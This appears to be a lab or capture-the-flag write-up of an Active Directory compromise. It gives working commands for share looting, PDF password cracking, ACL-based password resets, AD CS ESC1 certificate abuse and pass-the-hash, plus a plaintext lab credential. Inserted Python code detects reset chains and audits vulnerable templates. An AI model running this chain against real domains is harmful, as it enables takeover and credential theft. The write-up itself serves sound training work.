Red Team Engagement: WELCOME.local

Objective: From an initial foothold, escalate privileges to Domain Admin and demonstrate full domain compromise.

1. Initial Reconnaissance

Our initial scan of the target 10.1.160.68 revealed it to be DC01.WELCOME.local, a Windows Server 2022 Domain Controller.

Key services identified were:

  • Active Directory: LDAP (389), Kerberos (88), LDAPS (636)

  • File Sharing: SMB (445)

  • Remote Access: RDP (3389), MSRPC (135, dynamic)

  • Certificate Services: The TLS certificates presented by the server indicate that it also hosts a Certificate Authority (WELCOME-CA).

Using our initial credentials (e.hills:Il0vemyj0b2025!), we authenticated to SMB and enumerated the available shares. The Human Resources share was readable by our user.

2. BloodHound Enumeration

With our foothold, the next logical step was to map the Active Directory environment to find privilege escalation paths. We used bloodhound-python to collect the data.

bloodhound-python --zip -c All -d WELCOME.local -u e.hills -p 'Il0vemyj0b2025!' -dc DC01.WELCOME.local -ns 10.1.160.68

This command collects all users, groups, computers, and ACLs, saving them to a .zip file. After importing this "loot" into the BloodHound GUI, we confirmed that our user, e.hills, had no direct privilege escalation paths (like GenericAll or WriteDACL) to high-value targets.

This clean result forced us to pivot from direct ACL abuse to manual enumeration and hunting for credentials.


3. Escalation: From e.hills to a.harris

Our first step was to investigate the Human Resources share for sensitive information.

  1. We connected to the share using smbclient:

     smbclient "//10.1.160.68/Human Resources" -U "WELCOME\e.hills"
     Password: Il0vemyj0b2025!

  2. Inside, we found several files, including Welcome Start Guide.pdf. We downloaded it using mget *.

  3. The PDF was password-protected. We extracted its hash using pdf2john.py and cracked it with john.

     pdf2john.py Welcome\ Start\ Guide.pdf > pdf.hash
     john --wordlist=/usr/share/wordlists/rockyou.txt pdf.hash

  4. The cracked password was [REDACTED_PDF_PASSWORD]. This is the same value used in the next section to authenticate as a.harris.


4. Lateral Movement & User Flag

Our BloodHound data showed that the a.harris account is a member of the Remote Management Users group, which grants access to the host over WinRM (Windows Remote Management).

  1. We used evil-winrm to establish an interactive PowerShell session as a.harris.

     evil-winrm -i 10.1.160.68 -u a.harris -p '[REDACTED_PDF_PASSWORD]'

  2. We successfully gained a shell and captured the user flag.

     *Evil-WinRM* PS C:\Users\a.harris\Documents> type ..\Desktop\user.txt


5. Privilege Escalation Chain (a.harris -> i.park -> svc_ca)

This phase involved a multi-step abuse of Active Directory ACLs discovered via BloodHound.

  1. Hop 1 (a.harris -> i.park): BloodHound showed that a.harris has GenericAll rights over the user i.park, which includes the right to reset i.park's password. We used bloodyAD for this.

     bloodyAD --host '10.1.160.68' -d 'WELCOME.local' -u 'a.harris' -p '[REDACTED_PDF_PASSWORD]' set password 'i.park' '[REDACTED_NEW_PASSWORD]'

  2. Hop 2 (i.park -> svc_ca): BloodHound showed that i.park is a member of the Helpdesk group, which has ForceChangePassword rights on the svc_ca service account. We used bloodyAD again with our new i.park credentials.

     bloodyAD --host '10.1.160.68' -d 'WELCOME.local' -u 'i.park' -p '[REDACTED_NEW_PASSWORD]' set password 'svc_ca' '[REDACTED_NEW_PASSWORD]'

    We now have credentials for the svc_ca account, which is the key to the final step.
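Both hops above are password resets performed by another principal, which a domain controller records as Security event 4724. The following Python is an added example (not code from the original writeup) showing the two checks a defender would want over such events: resets that fall outside a delegated helpdesk scope, and chains in which the account that was just reset turns around and resets another account. The event records, the Helpdesk roster (i.park, helpdesk01) and the rule that service accounts are never reset through delegation are constructed assumptions for the example.

```python
"""Flag password resets that fall outside a delegated helpdesk scope.

Added example, not code from the original writeup. The records below are
constructed to resemble the fields of Windows Security event 4724 ("An attempt
was made to reset an account's password"). The Helpdesk roster and the
no-service-account rule are assumptions made for the example.
"""
from dataclasses import dataclass

EVENT_PASSWORD_RESET = 4724  # reset by another principal (4723 is a self-service change)

# Assumed delegation policy for the example.
HELPDESK_MEMBERS = {"i.park", "helpdesk01"}
PROTECTED_PREFIXES = ("svc_",)                    # service accounts
PROTECTED_ACCOUNTS = {"administrator", "krbtgt"}


@dataclass(frozen=True)
class ResetEvent:
    t: int          # minutes into the constructed log window
    event_id: int
    subject: str    # SubjectUserName: who performed the reset
    target: str     # TargetUserName: whose password was reset


def reset_reasons(ev: ResetEvent) -> list[str]:
    """Return the policy violations for one event (empty list means in policy)."""
    if ev.event_id != EVENT_PASSWORD_RESET:
        return []
    reasons = []
    if ev.subject.lower() not in HELPDESK_MEMBERS:
        reasons.append("subject is not a delegated helpdesk account")
    tgt = ev.target.lower()
    if tgt.startswith(PROTECTED_PREFIXES) or tgt in PROTECTED_ACCOUNTS:
        reasons.append("target is a protected service or admin account")
    return reasons


def suspicious_resets(events):
    """Events that violate the delegation policy, paired with their reasons."""
    return [(ev, r) for ev in events if (r := reset_reasons(ev))]


def reset_chains(events):
    """Pairs (earlier, later) where the account reset in `earlier` performs `later`.

    A victim becoming the next actor is the pattern of the two hops above
    (a.harris -> i.park -> svc_ca) and rarely happens in legitimate helpdesk work.
    """
    resets = sorted((e for e in events if e.event_id == EVENT_PASSWORD_RESET), key=lambda e: e.t)
    chains = []
    for i, later in enumerate(resets):
        for earlier in resets[:i]:
            if earlier.target.lower() == later.subject.lower():
                chains.append((earlier, later))
    return chains


# Constructed sample log; timestamps and the helpdesk01/new.hire accounts are made up.
SAMPLE_EVENTS = [
    ResetEvent(0,  4720, "helpdesk01", "new.hire"),   # account creation, not a reset
    ResetEvent(5,  4724, "helpdesk01", "e.hills"),    # helpdesk resets an ordinary user: in policy
    ResetEvent(12, 4724, "a.harris",   "i.park"),     # hop 1: actor is not a helpdesk member
    ResetEvent(15, 4724, "i.park",     "svc_ca"),     # hop 2: helpdesk member resets a service account
]

if __name__ == "__main__":
    for ev, reasons in suspicious_resets(SAMPLE_EVENTS):
        print(f"t+{ev.t:02d}m  {ev.subject} -> {ev.target}: {'; '.join(reasons)}")
    for earlier, later in reset_chains(SAMPLE_EVENTS):
        print(f"chain: {earlier.subject} -> {earlier.target} -> {later.target}")
```

On the constructed log, the first hop is flagged because a.harris is not a helpdesk account, the second because svc_ca is a service account, and the chain check links the two because the target of the first reset is the subject of the second. In a real environment the roster would be pulled from group membership rather than hard-coded.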


6. Domain Compromise: AD CS (ESC1) Abuse

The svc_ca account name suggests a role in the Certificate Authority (WELCOME-CA) identified during reconnaissance.

  1. We used certipy to find vulnerable certificate templates that svc_ca could enroll in.

     certipy find -u svc_ca@WELCOME.local -p '[REDACTED_NEW_PASSWORD]' -dc-ip 10.1.160.68 -vulnerable

  2. The output confirmed a critical ESC1 vulnerability. The template Welcome-Template lets the enrolling user (svc_ca) supply an arbitrary Subject Alternative Name (SAN), and its extended key usage permits client authentication, so a certificate issued from it can be used to log on as whichever account the SAN names.

  3. We exploited this by requesting a new certificate using this template, but we set the SAN to impersonate the Administrator user.

     certipy req -u 'svc_ca' -p '[REDACTED_NEW_PASSWORD]' \
       -ca 'WELCOME-CA' \
       -template 'Welcome-Template' \
       -upn 'administrator@WELCOME.local' \
       -dc-ip 10.1.160.68

  4. This saved a PFX file (administrator.pfx) to our machine.

  5. We then used certipy auth to authenticate to the DC as the administrator, using the certificate. This returned the administrator's NTLM hash.

     certipy auth -pfx administrator.pfx -dc-ip 10.1.160.68

    Hash: [REDACTED_ADMIN_HASH]
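The ESC1 finding in step 2 comes down to a handful of template attributes. The following Python is an added example (not code from the original writeup or from certipy) that evaluates those conditions over template records the way a periodic AD CS audit would, and contrasts the vulnerable template with a hardened copy. The two template records, the enrollment principals and the privileged-group names are constructed assumptions; a real audit would read the template objects over LDAP from the Configuration partition.

```python
"""Audit certificate templates for the ESC1 conditions described above.

Added example, not code from the original writeup or from certipy. The template
records are constructed to mirror the attributes AD CS stores on template objects
(under CN=Certificate Templates,CN=Public Key Services in the Configuration
partition). Template contents, enrollment principals and the privileged-group
names are assumptions made for the example.
"""

# msPKI-Certificate-Name-Flag bit: the requester builds the subject/SAN itself.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: requests wait for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that make a certificate usable to authenticate to the domain.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Assumed: only these principals should be able to enroll in a template whose SAN the requester controls.
PRIVILEGED_ENROLLERS = {"WELCOME\\Domain Admins", "WELCOME\\Enterprise Admins"}


def esc1_findings(template: dict) -> list[str]:
    """Return the ESC1 conditions a template meets; all five together make it ESC1."""
    findings = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("requester may supply the subject/SAN")
    ekus = set(template["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list also means 'any purpose'
        findings.append("certificate is valid for client authentication")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no CA manager approval required")
    if template["msPKI-RA-Signature"] == 0:
        findings.append("no authorized signature required")
    low_priv = sorted(set(template["enroll"]) - PRIVILEGED_ENROLLERS)
    if low_priv:
        findings.append("enrollable by low-privilege principals: " + ", ".join(low_priv))
    return findings


def is_esc1(template: dict) -> bool:
    return len(esc1_findings(template)) == 5


def audit(templates: dict) -> dict:
    """Map template name -> findings, for every template that is fully ESC1."""
    return {name: esc1_findings(t) for name, t in templates.items() if is_esc1(t)}


# Constructed records. WELCOME_TEMPLATE models the finding above; HARDENED_TEMPLATE
# shows the two settings that remove it: subject built from AD, manager approval required.
WELCOME_TEMPLATE = {
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "enroll": ["WELCOME\\Domain Users", "WELCOME\\svc_ca"],
}
HARDENED_TEMPLATE = {
    **WELCOME_TEMPLATE,
    "msPKI-Certificate-Name-Flag": 0,
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
}

if __name__ == "__main__":
    results = audit({"Welcome-Template": WELCOME_TEMPLATE, "Welcome-Hardened": HARDENED_TEMPLATE})
    for name, findings in results.items():
        print(name)
        for f in findings:
            print("  -", f)
```

Only Welcome-Template is reported: the hardened copy still permits client authentication and still has broad enrollment rights, but because the subject is built from the requester's AD object and every request waits for approval, a requester can no longer obtain a certificate naming a different account. Either of those two changes on its own is enough to close the ESC1 condition; removing the low-privilege enrollment rights is the third option.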


7. Domain Domination (Administrator Shell)

With the Administrator's NTLM hash, we have full control of the domain. We used evil-winrm again, this time passing the NT half of the hash ([REDACTED_ADMIN_NT_HASH]) with the -H flag instead of a password.

evil-winrm -i 10.1.160.68 -u 'Administrator' -H '[REDACTED_ADMIN_NT_HASH]'

We were immediately granted a SYSTEM-level shell, completing the objective.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

This engagement chained a readable file share, a weak PDF password, and multiple Active Directory misconfigurations (ACL abuse and AD CS ESC1) to move from a low-privilege user to full Domain Admin.